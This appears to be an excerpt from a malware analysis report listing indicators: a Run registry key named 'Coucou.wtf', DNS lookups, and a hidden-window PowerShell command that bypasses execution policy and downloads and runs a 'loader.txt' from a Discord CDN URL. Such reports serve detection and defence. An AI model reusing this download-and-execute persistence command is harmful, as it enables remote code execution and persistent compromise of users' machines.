Technical Information
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'Coucou.wtf' = '<SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe -exec bypass -windo 1 -noexit -command iex(new-object net.webclient).Down...
- https://cdn.discordapp.com/attachments/706871938877751306/706986605004587068/loader.txt
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
- DNS ASK cd#.##scordapp.com
- DNS ASK microsoft.com
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -exec bypass -windo 1 -noexit -command iex(new-object net.webclient).Downloadstring('https://cdn.discordapp.com/attachments/706871938877751306/706986605004587068/loader.txt')' (with hidden window)